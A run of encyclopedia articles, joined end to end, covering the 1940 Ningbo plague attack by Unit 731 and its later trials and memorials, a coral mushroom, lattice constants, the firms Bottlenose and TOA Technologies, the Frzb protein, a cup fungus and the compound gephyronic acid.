operation commenced at 7 p.m. on 30 November and was witnessed by officials from the Provincial Health Department and local residents of Ningbo. Prior to the burning, nearby streets were closed to traffic, and surrounding buildings were protected by the fire brigade. Except for valuable items that could be disinfected and removed, all other belongings within the epidemic area were incinerated. Provincial Health Department Director Chen Wanli inspected the area and approved the decision. On 30 November 1940, the authorities of Yin County carried out their plan to burn down all the houses in the epidemic area. Several points were selected within the epidemic area as ignition points, where straw was laid down and soaked with petrol, and designated routes were established for the fire setters. The perimeter was tightly guarded by military and police forces, and the entire city's fire brigade was mobilized to protect the safety of buildings outside the epidemic area. At around six or seven in the evening, fires were simultaneously ignited at 11 locations within the epidemic area, and flames shot up into the sky, burning for a full four hours. All the residences, shops, and factories within the epidemic area were engulfed by the blaze. A total of 115 households, comprising 137 houses and 5,000 square metres of buildings, were reduced to rubble overnight. The fire spread towards the houses across East Avenue, blackening their outer walls and sending sparks flying. The fire brigade then aimed their hoses at these row houses and activated the water pumps.
In North Taiping Lane, where the road was narrow, houses were specifically protected by sprinkler heads. The specific areas burned included 224 to 268 East Zhongshan Road, Jiang Zhongji to Jiuhe Xiang Smoke Shop, 64 to 98 Kaiming Street, and 139, 133, 129, 128, 127, 126, 125, 124, 123, 122, 121, 120, 118, 130 (Tongshun Store), 131, 134, 136 (Wang Renlin), 138, 132, 140, 141 (Xu Shenglai), 142, and 143 Donghou Street. Additionally, there were 8 upstairs houses, 5 front and back small coverings, and 3 high-level flat-roofed houses in the Kaiming Street temple, and 28 third-floor market houses and 3 second-floor market houses in Taiping Lane. Until the 1960s, this burned area was still referred to as the "plague field." After the Imperial Japanese Army entered Ningbo in 1941, they demolished the isolation walls. Investigations Nationalist government Theory of local origins In October and November 1940, Chen Wanli of the Zhejiang Provincial Health Department and others involved in the prevention and control of the plague in Zhejiang, such as Liu Jingbang, did not believe that the plague in Ningbo at that time was caused by Japanese biological weapons. On 5 November, the Shishi Gongbao published an article titled "Investigating the Origin of the Disease," which rejected the speculation of Japanese biological weapons and put forward the "local origin" theory. The article pointed out that a plague-like event had occurred in the Donghou Street area of Kaiming Street, which was initially suspected to be caused by enemy aircraft spreading poison. However, based on factual inference, several factors may have contributed to the outbreak: the Donghou Street area used to have a city moat, which was filled with garbage when the riverbed was filled in, and dead rats were inevitably mixed into the garbage pile. Toxins from the long-decomposed rats, or toxins bred in the garbage, could trigger a plague-like outbreak once they entered the human body. From this report, it can be inferred that the source of the plague in Ningbo was considered similar to that of the Qingyuan plague in 1938, both originating locally, with "rotting dead rats" or "garbage brewing toxins" leading to the occurrence of the plague. Theory of biological warfare On 28 November 1940, the Japanese bombed Jinhua, scattering granular particles resembling fish eggs, which were confirmed to contain Yersinia pestis. On 5 December, Huang Shaohong, the Chairman of the Zhejiang Provincial Government, telegraphed all county magistrates, instructing them to immediately report any outbreaks and establish epidemic prevention committees to promptly seal off affected areas and isolate patients. He also reported the finding to Chiang Kai-shek via telegram, asserting that his province was under attack by Japanese biological weapons. On 29 November 1940, the Shishi Gongbao reported that Japanese aircraft had attacked Jinhua on 28 November and, in addition to releasing poison gas, had also dispersed Gram-negative bacilli in an attempt to attack civilians. By 3 December, the Shishi Gongbao suggested that the source of the plague in Ningbo was "enemy aircraft spreading poison," but stopped short of making a definitive statement, only stating that "the enemy's intentions are sinister, and poisoning is possible." However, Ningbo health officials remained divided on whether the epidemic in Ningbo originated from Japanese biological weapons.
On 10 December 1940, Chen Wanli reported to the Nationalist Government, stating, "About a week before the onset of the illness, enemy aircraft dropped about 2 liters of wheat over the epidemic area. Whether this is related to the epidemic is yet to be determined." By mid-December, Chen Wanli, Liu Jingbang, and Ke Zhuguang confirmed that the plague in Qu County and Jinhua was the result of "enemy aircraft spreading poison." Huang Shaohong, Chairman of the Zhejiang Provincial Government, pointed out in his report to the Nationalist Government that there was a strong correlation between the Ningbo plague and the suspected Japanese aircraft dissemination, citing evidence of Japanese aircraft dispersing plague bacilli in Jinhua, which could prove Japan's use of bacteriological warfare. While Zhejiang's provincial government introduced a law to manage airdrops from Japanese aircraft, Chen Wanli and other Zhejiang health officials were disbelieved by the experts of the National Health Administration, including Robert Pollitzer. Further investigations In December 1940, the National Health Administration convened a national health technology conference in Chongqing to discuss the plague in Ningbo. During the meeting, the microbiologist Chen Wengui pointed out that the Japanese had conducted bacteriological warfare in China, but he was accused of being overly sensitive by the conference chairman. During the Zhejiang Plague Consultation Conference chaired by Jin Baoshan, Robert Pollitzer expressed skepticism about the theory of bacteriological warfare causing the plague. The Nationalist Government received accusations stating that the epidemic was not the plague and that burning down houses was unnecessary. In January 1941, Jin Baoshan dispatched the Director of the Epidemic Prevention Department, Rong Qirong, and others to investigate in Zhejiang. Before arriving in Ningbo, Pollitzer had already examined the blood smears held at the provincial health department and verified the course and onset of the disease. The investigation proposed two theories: one was that the epidemic originated from elsewhere and spread to Ningbo, as there had been a plague outbreak in Qingyuan, southern Zhejiang; the other was that Japanese aircraft had spread fleas and other substances by dropping wheat and grains. However, transport from Qingyuan to Ningbo was extremely inconvenient, and no outbreaks occurred along the way. The areas where Japanese aircraft dropped the most wheat and grains also had the highest death tolls. Additionally, strange fleas were found in the epidemic area, slightly smaller in size and red in color, distinct from local fleas. After the investigation, Rong Qirong supported Pollitzer's judgment, believing there was not enough scientific evidence for biological warfare. On 5 March 1941, Chen Wanli, the highest health official of Zhejiang, wrote to Yu Jimin, the Magistrate of Yin County, requesting the submission of photographs of the airdropped wheat after germination as evidence, to be forwarded to Chongqing for verification. He also mentioned that detailed records of plague cases from the previous year and investigations related to patient onset needed to be provided urgently in response to central government requests. Chen Wanli further instructed Zhang, the director of the Yin County Health Bureau, to submit detailed records of plague cases from the previous year and to send a copy of the plague patient investigation form.
He emphasized that all documents needed to be submitted within ten days for transmission to the central authorities, including information on the isolation status of all patients and the entire period of quarantine work. On 4 November 1941, using the same method, the Japanese attacked Changde, resulting in 2,810 people being infected with the plague. Immediately after the attack, Chen Wengui led a team to investigate. He performed autopsies on the bodies and injected lymph node puncture blood from patients into guinea pigs, which died five days later. By observing patient samples and conducting pathological analysis, it was concluded that the patients had died from sepsis caused by Yersinia pestis. Chen Wengui compiled the evidence gathered into the "Investigation Report on the Plague in Changde, Hunan," confirming Japanese bacteriological warfare. However, the Nationalist government, considering the matter's impact on international credibility, altered the report. It was not until 1950 that the report resurfaced from the archives. Imperial Japanese Army Indirect sources The Japanese military monitored local media reports and regularly dispatched military aircraft to surveil the situation. The plague outbreak that followed the air raids indicated that a bacteriological warfare attack could succeed by rapidly disseminating a bacterial vector from aircraft, a development that pleased Shiro Ishii. Ishii concluded that for successful attacks, bacteria should not be dispersed from high altitudes; instead, fleas and pathogens should be released together. Additionally, Shiro Ishii had the Ningbo plague specifically filmed as a documentary to publicise his achievements. On 25 November 1940, the Imperial Japanese Army ordered the experiments terminated, with all participants instructed to return to their original units and maintain secrecy. By the end of 1940, the Emperor ordered the expansion of Unit 731, increasing its personnel to 3,000 and establishing the Hailar Detachment, Sunwu Detachment, Hailin Detachment, and Linkou Detachment. Starting from 1940, an annual budget of 10 million yen was allocated to Unit 731. Shiro Ishii, the commander of Unit 731, was promoted to Major General on 1 March 1941. Field study In April 1941, following the Japanese occupation of Ningbo, a further investigation into the effectiveness of the plague attack in Ningbo was launched. The Kwantung Army transferred five researchers from Unit 731 to Nanjing to collaborate with Unit 1644 in investigating the effectiveness of the plague attack in Ningbo. In early May, eleven senior Japanese generals visited the vicinity of the epidemic area to meet with Jin Tirong, who had been responsible for epidemic prevention work in 1940. They questioned him extensively about the occurrence of the plague in Ningbo, including when and where it first occurred, which household was initially affected, whether there had been aircraft dispersal of wheat, and whether there had been accusations from the local population against the Japanese military, among other details. This questioning lasted for about two hours, and the contents were meticulously recorded. Kaneko thesis According to the doctoral thesis of Junichi Kaneko, a military doctor of Unit 731, on 27 October 1940, Unit 731 scattered 2 kilograms of plague bacteria over Ningbo, Zhejiang Province, using aircraft.
According to the data shown in the thesis's charts, the plague began to spread in Ningbo on 30 October, with 3 cases reported on the 31st, increasing to 9 cases on 1 November, peaking at 13 cases on the 6th, with 10 cases on the 8th, 8 cases on the 9th, and 7 cases on the 12th, gradually declining thereafter until the last case on 7 December, lasting a total of 39 days with 112 reported cases. Patients who escaped from the epidemic area created conditions for a "second infection." According to research conducted by the Japanese military in Ningbo, 1,450 people died in the second round of infections. On 15 October 2011, representatives of the Tokyo-based citizen organization "Revealing the Truth of Unit 731's Bacterial Warfare" and five others, including Professor Matsumura Takao from Keio University and Wang Xuan, a descendant of victims of bacterial warfare in China, held a press conference in Tokyo. They urged the Japanese government to disclose information on bacterial warfare and face up to historical truths. The organization discovered the first part of a classified military report from the Army Medical School's Epidemic Research Institute, titled "Estimation of PX's Effectiveness," at the Kansai Branch of the National Diet Library in Kyoto. This report directly documented Japan's conduct of bacterial warfare in China, challenging the Japanese government's claim of "no evidence" in response to Chinese accusations of Unit 731's bacterial warfare. The cover of the report bears the words "Military Secret" and contains the name of a senior military doctor who graduated from Teikyo University and recorded the content on 14 December 1943. The report explains that "PX" refers to fleas infected with Yersinia pestis, and it calculates the effectiveness of spreading bacteria bombs on the battlefield. The report lists the quantities of PX used and the number of infected individuals in various locations in China, including Nong'an, Quzhou, Ningbo, Changde, Guangxin, Guangfeng and Yushan. It states that over 26,000 people were infected once or twice, defining PX as "the best bacterial bomb, capable of causing psychological and economic panic." Trials Khabarovsk, Soviet Union On 25 December 1949, the Soviet Union began the trial of Japanese prisoners of war involved in bacteriological warfare in Khabarovsk. During the Khabarovsk trial, Japanese prisoners admitted to the "aerial dissemination of pathogens" that took place in Ningbo in 1940. Susumu Hatano testified that the experiment in Ningbo was the first actual field test and, because it was conducted on enemy territory, the results were inconclusive. However, the Japanese military drew conclusions about the bacteriological warfare experiment based on information recorded in Ningbo newspapers and laboratory test data. On 29 December 1949, a forensic medical examination committee composed of six medical biologists from the Soviet Academy of Medical Sciences, including academician Zhukov-Verezhnikov, studied all the materials related to the criminal case against the Japanese prisoners charged with preparing and using bacteriological weapons. The committee confirmed that the experiments and production conducted by the Japanese Kwantung Army's Unit 731, Unit 100, and Unit 1644 of the Japanese Expeditionary Forces in China were aimed at exploring and manufacturing bacteriological weapons, as well as researching methods for their use.
The committee also confirmed that in 1940, under the leadership of Shiro Ishii, a combat expedition equipped with large quantities of Bacillus anthracis, Vibrio cholerae, and plague-infected fleas was sent to Ningbo. The aerial dissemination of plague-infected fleas by aircraft resulted in a plague epidemic in the Ningbo area. After news of the Khabarovsk trial reached China, the Zhejiang Daily published a news article on 7 February 1950, stating that personnel from the Zhejiang Provincial Health Department, including Wang Yuzhen, Zheng Jie'an, Yu Hanjie, and Jin Qiu, submitted a written report in support of the Soviet Union's trial of Japanese bacteriological warfare criminals. The report criticized the Zhejiang Health Department of the time for not taking action when the Japanese military continuously disseminated plague bacteria in various areas of Zhejiang, and for instead covering up for the Imperial Japanese Army. Tokyo, Japan After the war, the activities of Unit 731 remained confidential and did not appear in the Tokyo Trials. It was not until the publication of The Devil's Gluttony in 1981 that the unit's activities were first revealed to the public. Dozens of lawsuits seeking compensation for wartime acts committed in the first half of the 20th century, including during World War II, have been filed against the Japanese government and companies associated with Japanese aggression. However, almost all of these lawsuits were rejected by Japanese courts, and the Japanese government has never formally acknowledged that the Japanese military conducted bacteriological warfare. In 1996, a group of Japanese anti-war activists came to China to investigate the victims of bacteriological warfare and expressed their willingness to help the victims sue the Japanese government for its crimes. Subsequently, in 1997 and 1999, a total of 180 plaintiffs from Zhejiang (Quzhou, Ningbo, Jiangshan, Yiwu) and Hunan (Changde) filed lawsuits against Japan, demanding that the Japanese government acknowledge its crimes of bacteriological warfare in China and apologise to and compensate the victims. During the five-year trial, veterans of Unit 731 admitted to participating in live dissections, cultivating agents such as anthrax, typhoid, and cholera, and releasing plague-infected fleas into villages. Plaintiffs from China flew to Japan to testify, describing how Japanese planes flew low and dropped infected wheat, rice, or cotton, leading to mysterious disease outbreaks in villages. Despite a series of confessions from former soldiers, the Japanese government acknowledged the unit's existence but still refused to disclose the scope of its scientists' activities. During the debates in the Tokyo District Court, Chinese bacteriologist Huang Ketai pointed out that unlike previous epidemics, the Ningbo plague in 1940 occurred in winter rather than summer and was carried by fleas that were not native to the region, which killed humans without affecting mice. In 2002, based on 28 hearings and a large amount of evidence, the Tokyo District Court issued a written judgment confirming for the first time that the Japanese military had conducted bacteriological warfare. However, many plaintiffs were angry at the rejection of their compensation claims and appealed. In 2005, the Tokyo High Court upheld the 2002 ruling of the Tokyo District Court and rejected the request for an apology from the Japanese government for its biological warfare in China before and during World War II.
The Japanese Supreme Court subsequently rejected the appeal, stating that international law prohibits foreign citizens from directly seeking compensation from the Japanese government. Memorials On 3 September 1995, the Ningbo Municipal People's Government erected a monument on the pedestrian walkway of Kaiming Street, inscribed with the words "Site of the Plague Field in Ningbo Infected by the Bacteriological Warfare of the Japanese Invaders," with the central inscription reading "Never Forget National Humiliation, Strive to Strengthen the Nation." It was signed by "Various sectors of Ningbo City on the 50th anniversary of the victory of the War of Resistance Against the Japanese." In 2005, the monument was relocated to the original site of the bacteriological epidemic area on the west side of Tianyi Haoting. The new monument's front is engraved with the words "Do Not Forget National Humiliation, Strive to Strengthen the Nation," with bacteriological warfare historical materials and a list of victims carved on both sides. In 2009, the Publicity Department of Haishu District Committee, the District Radio, Television, and News Bureau, the District Cultural Relics Management Office, and the Ningbo New Fourth Army Historical Research Association jointly established the "Ningbo Kaiming Street Plague Disaster Exhibition Hall" on the second floor of the Tianyi Business Circle Party and Mass Service Center. The curved wall on the right side of the entrance of the exhibition hall lists the names of all the victims. In the centre of the hall, there is a sand table displaying a model of the buildings in the Kaiming Street epidemic area, reconstructed according to the "Epidemic Area Map" provided by the family of the victim Hu Dingyang. References Further reading Japanese war crimes in China 1940 in Japan 1940 in China Biological warfare Japanese biological weapons program Second Sino-Japanese War crimes Military history of Ningbo
Kaimingjie germ weapon attack
Biology
7,863
38,393,517
https://en.wikipedia.org/wiki/Ramaria%20cokeri
Ramaria cokeri is a coral mushroom in the family Gomphaceae. It was described in 1976 from the Appalachian Mountains in the United States. Some authors have proposed placing the species in a separate genus, Phaeoclavulina, based on molecular analyses, but this was explicitly rejected in a subsequent publication because of the morphological variability it would introduce into the resulting genus. The species has been reported from Japan, Mexico, Colombia, Malaysia, Indonesia, Sri Lanka, Pakistan, Papua New Guinea, Solomon Islands, and New Zealand. In 2012, it was reported for the first time from the Canary Islands and Guinea. References Gomphaceae Fungi described in 1976 Fungi of Africa Fungi of Asia Fungi of New Zealand Fungi of North America Taxa named by Ron Petersen Fungi of Macaronesia Fungus species
Ramaria cokeri
Biology
159
3,263,791
https://en.wikipedia.org/wiki/Lattice%20constant
A lattice constant or lattice parameter is one of the physical dimensions and angles that determine the geometry of the unit cells in a crystal lattice, and is proportional to the distance between atoms in the crystal. A simple cubic crystal has only one lattice constant, the distance between atoms, but in general lattices in three dimensions have six lattice constants: the lengths a, b, and c of the three cell edges meeting at a vertex, and the angles α, β, and γ between those edges. The crystal lattice parameters a, b, and c have the dimension of length. The three numbers represent the size of the unit cell, that is, the distance from a given atom to an identical atom in the same position and orientation in a neighboring cell (except for very simple crystal structures, this will not necessarily be the distance to the nearest neighbor). Their SI unit is the meter, and they are traditionally specified in angstroms (Å); an angstrom being 0.1 nanometer (nm), or 100 picometres (pm). Typical values start at a few angstroms. The angles α, β, and γ are usually specified in degrees. Introduction A chemical substance in the solid state may form crystals in which the atoms, molecules, or ions are arranged in space according to one of a small finite number of possible crystal systems (lattice types), each with a fairly well-defined set of lattice parameters that are characteristic of the substance. These parameters typically depend on the temperature, pressure (or, more generally, the local state of mechanical stress within the crystal), electric and magnetic fields, and the isotopic composition. The lattice is usually distorted near impurities, crystal defects, and the crystal's surface. Parameter values quoted in manuals should specify those environmental conditions, and are usually averages affected by measurement errors. Depending on the crystal system, some or all of the lengths may be equal, and some of the angles may have fixed values. In those systems, only some of the six parameters need to be specified. For example, in the cubic system, all of the lengths are equal and all the angles are 90°, so only the a length needs to be given. This is the case of diamond, which has a = 3.567 Å at 300 K. Similarly, in the hexagonal system, the a and b constants are equal and the angles are 90°, 90°, and 120°, so the geometry is determined by the a and c constants alone. The lattice parameters of a crystalline substance can be determined using techniques such as X-ray diffraction or with an atomic force microscope. They can be used as a natural length standard in the nanometer range. In the epitaxial growth of a crystal layer over a substrate of different composition, the lattice parameters must be matched in order to reduce strain and crystal defects. Volume The volume of the unit cell can be calculated from the lattice constant lengths and angles. If the unit cell sides are represented as vectors, then the volume is the scalar triple product of the vectors. The volume is represented by the letter V. For the general unit cell, V = abc√(1 − cos²α − cos²β − cos²γ + 2·cosα·cosβ·cosγ). For monoclinic lattices with α = 90° and γ = 90°, this simplifies to V = abc·sinβ. For orthorhombic, tetragonal and cubic lattices, with β = 90° as well, this reduces to V = abc. Lattice matching Matching of lattice structures between two different semiconductor materials allows a region of band gap change to be formed in a material without introducing a change in crystal structure. This allows construction of advanced light-emitting diodes and diode lasers.
For example, gallium arsenide, aluminium gallium arsenide, and aluminium arsenide have almost equal lattice constants, making it possible to grow almost arbitrarily thick layers of one on the other. Lattice grading Typically, films of different materials grown on the previous film or substrate are chosen to match the lattice constant of the prior layer to minimize film stress. An alternative method is to grade the lattice constant from one value to another by controlled alteration of the alloy ratio during film growth. The beginning of the graded layer has an alloy ratio that matches the underlying lattice, and the alloy at the end of the layer growth matches the desired final lattice for the following layer to be deposited. The rate of change in the alloy must be determined by weighing the penalty of layer strain, and hence defect density, against the cost of time in the epitaxy tool. For example, indium gallium phosphide layers with a band gap above 1.9 eV can be grown on gallium arsenide wafers with index grading. List of lattice constants References External links How to Find Lattice Constant Crystals Semiconductor properties
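As a worked illustration of the unit-cell volume formulas in the Volume section above (an editor's sketch, not part of the original article), the general triclinic expression can be evaluated directly; the diamond figure assumes the a = 3.567 Å value quoted earlier.

import math

def unit_cell_volume(a, b, c, alpha, beta, gamma):
    # General triclinic cell: V = abc * sqrt(1 - cos^2(a) - cos^2(b) - cos^2(g)
    #                                          + 2*cos(a)*cos(b)*cos(g))
    ca, cb, cg = (math.cos(math.radians(x)) for x in (alpha, beta, gamma))
    return a * b * c * math.sqrt(1 - ca**2 - cb**2 - cg**2 + 2 * ca * cb * cg)

# Cubic diamond: a = b = c = 3.567 angstroms, all angles 90 degrees, so V = a^3
print(unit_cell_volume(3.567, 3.567, 3.567, 90, 90, 90))  # ~45.4 cubic angstroms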
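The grading scheme described above can likewise be sketched in code. The following assumes a simple linear (Vegard's-law-style) interpolation between two end-member lattice constants; the GaAs-like and InP-like values are standard figures used here only for illustration.

def graded_lattice_constants(a_substrate, a_target, n_sublayers):
    # Step the alloy's lattice constant linearly from the substrate value
    # to the target value, one sublayer at a time (Vegard's-law approximation).
    step = (a_target - a_substrate) / (n_sublayers - 1)
    return [a_substrate + i * step for i in range(n_sublayers)]

# Hypothetical grade from a GaAs-like 5.653 angstroms toward an InP-like 5.869
print([f"{a:.3f}" for a in graded_lattice_constants(5.653, 5.869, 5)])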
Lattice constant
Physics,Chemistry,Materials_science
944
40,662,884
https://en.wikipedia.org/wiki/Bottlenose%20%28company%29
Bottlenose.com, also known as Bottlenose, is an enterprise trend intelligence company that analyzes big data and business data to detect trends for brands. It helps Fortune 500 enterprises discover and track emerging trends that affect their brands. The company uses natural language processing, sentiment analysis, statistical algorithms, data mining, and machine learning heuristics to determine trends, and has a search engine that gathers information from social networks. KPMG Capital has invested a "substantial amount" in the company. As of December 2014, Bottlenose processed 72 billion messages per day, in real time, from across social and broadcast media. History The company is based in Los Angeles, CA. Bottlenose is a real-time trend intelligence tool that measures social media campaigns and trends. The company also provides a free version of its Sonar tool that shows real-time trends across social media. In October 2012, the company received $1 million of funding from ff Venture Capital and Prosper Capital. By 2014, the company had raised about $7 million in funding. In December 2014, KPMG Capital announced further investment in the company. In February 2015, the company confirmed it had raised $13.4 million in Series B funding led by KPMG Capital. Bottlenose partnered with the nonprofit No Labels during the 2014 State of the Union Address to analyze Twitter conversations for bipartisanship. The company also partnered with media monitoring company Critical Mention to analyze broadcast analytics. The Bottlenose Nerve Center integrated with the Critical Mention API to analyze real-time trends in television and radio broadcasts. In June 2014, Bottlenose updated its trend detection product to Nerve Center 2.0. It creates a newsfeed to show changes in trends and sends alerts when trends occur. It also has "emotion detection," which displays the emotions associated with specific comments on trending topics. In 2016, Bottlenose released its Nerve Center 3.0 platform, which was designed to automate the work of data scientists and lower the cost of artificial intelligence for businesses. See also Sentiment analysis Big data analysis References External links Official website Bottlenose Offers Real-Time Trend Intelligence For Social Media and Beyond American social networking websites Social media companies Natural language processing Research support companies Technology companies established in 2010 American companies established in 2010
Bottlenose (company)
Technology
468
5,162,760
https://en.wikipedia.org/wiki/Frzb
Frzb (pronounced like the toy frisbee) is a Wnt-binding protein especially important in embryonic development. It is a competitor for the cell-surface G-protein receptor Frizzled. Frizzled is a tissue polarity gene in Drosophila melanogaster and encodes integral proteins, known as serpentine receptors, that function as cell-surface receptors for Wnts. The integral membrane proteins contain a cysteine-rich domain thought to be the Wnt-binding domain in the extracellular region. The signals are initiated at the seven-transmembrane domain and transmitted through receptor coupling to G-proteins. This protein is expressed in chondrocytes, making it important in skeletal development in the embryo and fetus. Frzb is localized in the extracellular plasma membrane. Unlike frizzled, frzb lacks the 7 transmembrane domains normally found in G-protein-coupled receptors. It is still considered a homolog of frizzled because it contains a Cysteine Rich Domain (CRD), and because of its intracellular C-terminus, which is crucial for signaling. The CRD is highly conserved in diverse proteins, such as receptor tyrosine kinases, and functions as a ligand-binding domain. The C-terminal is a carboxyl terminus located intracellularly and is required for canonical signaling. The serpentine receptors couple to G-proteins: binding of the ligand (a Wnt protein) activates G-protein signaling. A signal transduction cascade results in the secretion of two groups of antagonists. The first group of antagonists comprises the secreted Frizzled Related protein family (Sfrp) and Wnt inhibitory factor (Wif). Both Sfrp and Wif bind directly to Wnt proteins, blocking activation of the receptor. The second group of antagonists contains a class of Wnt inhibitory proteins known as Frizzled Receptor-like Proteins (FRPs). FRPs bind to the LRP (low-density-lipoprotein-related protein) co-receptors, blocking activation of the Wnt signaling pathway. One such pathway involving the Frizzled (Fz) family is Wnt/β-Catenin (β-Cat) signaling. β-Cat is an intracellular signal that is held in check by axin. In this pathway, the activation of Wnt receptors is transduced by the canonical pathway via a series of phosphorylation steps leading to the stabilization and nuclear import of β-Cat, which associates in the nucleus with T-cell factor (TCF), a DNA-binding protein family. The β-Cat and TCF complex activates target genes of the Wnt pathway. In the absence of Wnt, β-Catenin is phosphorylated by a complex containing GSK3 (glycogen synthase kinase 3), which targets β-Cat for proteasomal degradation. In the nucleus, members of the T-cell factor (TCF) family of DNA-binding proteins repress Wnt targets along with co-repressors such as Groucho (Gro). If Wnt is present, it binds to Fz-LRP receptors, causing axin to bind to the intracellular domains of LRP and Fz. Dishevelled (Dvl) is a protein required for the Wnt-dependent inhibition of this complex. The combination of LRP and axin induces Dvl phosphorylation (P), which blocks the APC-axin-GSK3 complex from phosphorylating β-Cat. The accumulated β-Cat then enters the nucleus and converts TCF into a transcriptional activator. Defects in Frzb are associated with female-specific susceptibility to osteoarthritis (OA), the most prevalent form of arthritis and a common cause of disability.
Frzb (known as Frzb1 or Sfrp3, Secreted Frizzled Related Protein 3) was initially identified as a chondrogenic factor during bone morphogenesis, and was described as a novel marker of the neural crest-derived mesenchymal cells that contribute to dental follicle formation, the future periodontium. See also Signal transduction Morphogenesis Developmental biology Embryogenesis Cancer Catenin References External links Signal transduction
Frzb
Chemistry,Biology
958
23,809,963
https://en.wikipedia.org/wiki/Microstoma%20floccosum
Microstoma floccosum is a species in the cup fungus family Sarcoscyphaceae. It is recognizable by its deep funnel-shaped, scarlet-colored fruit bodies bearing white hairs on the exterior. Found in the United States and Asia, it grows on partially buried sticks and twigs of oak trees. Taxonomy One variety has been described, M. floccosum var. floccosum, found in China and Japan, with large spores. The fungus originally described as Microstoma floccosum var. macrosporum was recognized as an independent species in 2000 and renamed M. macrosporum. It differs from M. floccosum in fruiting season, asci and ascospore size, and the ultrastructure of the hairs. Description The fruit bodies are cup- or funnel-shaped; the margins of the cup are curved inwards when young. Both the interior and exterior surfaces of the cup are scarlet red. The exterior surface is covered with stiff white hairs. Details of the hair structure may be seen with a magnifying glass: they are up to 1 mm long or more, translucent, thick-walled, rigid, and more or less sword-shaped with simple, sharply diminishing bases. They are connected to the fruit body at the junction of internal tissue layers called the medullary and ectal excipulums. When the hairs come in contact with an alkali solution of 2% potassium hydroxide, the thick walls of the base of the hair first swell in size and then dissolve, releasing the contents of the internal lumen. The stipe is cylindrical and 1–2 mm thick. The species is inedible. Microscopic characteristics The spores are 20–30 by 14–16 μm; the asci (spore-bearing cells) are 300–350 by 18–20 μm. The paraphyses (sterile, upright, basally attached filaments in the hymenium, growing between asci) are thin, slightly thickened at the tip, and contain many red granules. Similar species Microstoma apiculosporum is a species from Taiwan that has spores with short, sharply pointed tips. Scutellinia scutellata has a shallow red cup, no stalk, and black hairs on only the edge of the cap margin. The stalked scarlet cup, Sarcoscypha occidentalis, has a shape, size and color that somewhat resemble M. floccosum, but it lacks any surface hairs, and the cup is not as deep. Distribution and habitat Microstoma floccosum has been collected from the United States, India, China, and Japan. A saprobic species, M. floccosum grows scattered to clustered together, attached to wood that is typically partially buried in the earth. A preference for both oak and shagbark hickory has been noted. References Sarcoscyphaceae Fungi described in 1832 Fungi of Asia Fungi of the United States Inedible fungi Fungi without expected TNC conservation status Fungus species
Microstoma floccosum
Biology
635
21,521,968
https://en.wikipedia.org/wiki/TOA%20Technologies
TOA Technologies is an American software-as-a-service company that develops, markets and sells ETAdirect, a web-based application solution for companies with small, medium, and large mobile workforces across the world. Headquartered in Beachwood, Ohio, its products include advanced tools for automating and optimizing planning, scheduling, appointment booking, and routing, as well as job allocation and real-time field service event management. Mobile workers have access to HTML5-based mobility apps that provide location-based information, forecasting, capacity management, routing, real-time field management, dispatch, and customer communications through ETAdirect. TOA Technologies was acquired by Oracle in 2014. ETAdirect ETAdirect is delivered as software as a service and employs a patented algorithm that uses pattern recognition to gauge the arrival time of a mobile employee at a customer's location. The algorithm also provides data that enables the estimation of job length. ETAdirect's prediction window is typically less than 60 minutes, allowing for precise notices to consumers over a variety of channels, including voice, email, text, X, and other communications channels. This technology aims to reduce customer queries to service provider call centers. ETAdirect is currently used by several cable television companies in North America, including Cox Communications, and by broadband operators in Europe, such as Virgin Media and ONO (Spain). The company also provides its service to global communications companies such as Telefonica and global utility companies like E.ON. Company information TOA Technologies was founded by Yuval Brisker and Irad Carmi in 2003. The company is privately held, has more than 550 employees worldwide, and is headquartered in Beachwood, Ohio, with additional offices in London, United Kingdom, and São Paulo, Brazil. Principal venture shareholders are Technology Crossover Ventures, Draper Triangle Ventures (a DFJ network affiliate), Intel Capital, and Sutter Hill Ventures. TOA stands for "Time of Arrival." The concept of time is central to the ETAdirect software solution set, as its central algorithm measures time and predicts performance based on resource-specific pattern recognition and predictive analytics. This yields more accurate time-of-arrival estimates than the alternative of managing service appointments according to averages of workforce capabilities and availability. As of December 2013, TOA Technologies had over 85,000 users. Oracle Corporation announced that it was acquiring TOA Technologies on July 31, 2014. Milestones In July 2013, TOA Technologies closed a major round of funding with Technology Crossover Ventures, raising $66 million to transform global field service management. On July 31, 2014, Oracle Corporation announced that it was buying TOA Technologies. The transaction closed in mid-September 2014. See also Software as a service Decision support system Service chain optimization Field service management Enterprise mobility management Customer relationship management Customer experience management Workforce management Vehicle routing problem References Software companies based in Ohio Centralized computing Cloud computing providers Service-oriented (business computing) Business software companies Oracle acquisitions 2014 mergers and acquisitions Defunct software companies of the United States
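TOA's patented algorithm is not public, so the following is only a generic, hedged sketch of the idea of resource-specific prediction from historical job durations; the function name and all numbers are hypothetical.

def update_estimate(previous_estimate, observed_minutes, weight=0.3):
    # Exponentially weighted moving average: recent jobs count more, so the
    # estimate adapts to each individual technician's working pattern.
    return (1 - weight) * previous_estimate + weight * observed_minutes

history = [52, 47, 65, 50]        # hypothetical past job durations, in minutes
estimate = history[0]
for duration in history[1:]:
    estimate = update_estimate(estimate, duration)
print(round(estimate))            # expected duration of this technician's next job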
TOA Technologies
Technology
634
50,718,063
https://en.wikipedia.org/wiki/Gephyronic%20acid
Gephyronic acid is a polyketide that exists as an equilibrating mixture of structural isomers. In nature, gephyronic acid is produced by the slow-growing myxobacteria Archangium gephyra strain Ar3895 and Cystobacter violaceus strain Cb vi76. It was the first myxobacterial antibiotic reported to specifically inhibit eukaryotic protein synthesis. Biological properties Preliminary studies demonstrated that gephyronic acid inhibited the growth of yeast and molds and elicited a cytostatic effect through the inhibition of eukaryotic protein synthesis in mammalian cell cultures. Feeding experiments done with radioactive precursors showed a drastic difference in the incorporation of leucine by a human leukemic cell line, K-562, but little difference in the incorporation of uridine and thymidine. This suggested that the primary target of gephyronic acid is protein synthesis. As such, it is a potential lead for cancer chemotherapy. Gene expression profiling of human breast cancer cell lines is underway in an effort to further define the potential of gephyronic acid as a chemotherapeutic lead. Screening of a library of compounds derived from myxobacteria found that gephyronic acid was the strongest inhibitor of processing body (P-body) assembly. P-bodies are discrete cytoplasmic mRNP granules that contain non-translating mRNA and protein from the mRNA decay pathway and from the miRNA silencing machinery. Within P-bodies, mRNAs can be degraded, but components of P-bodies can rapidly cycle in and out to return to translation. The mechanism of P-body assembly inhibition by gephyronic acid has not been characterized, but initial studies suggest that the mode of action could be through stalling ribosomes on mRNA or by affecting early steps of translation initiation, such as the binding of ribosomal subunits or initiation factors. The same study also found that gephyronic acid inhibits eIF2α phosphorylation and the formation of stress granules under stress conditions. Stress granules contain non-translating mRNAs and translation initiation factors, suggesting that they may form as a result of the aggregation of mRNPs stalled during translation initiation. By monitoring immunofluorescence of an established stress-granule marker, it 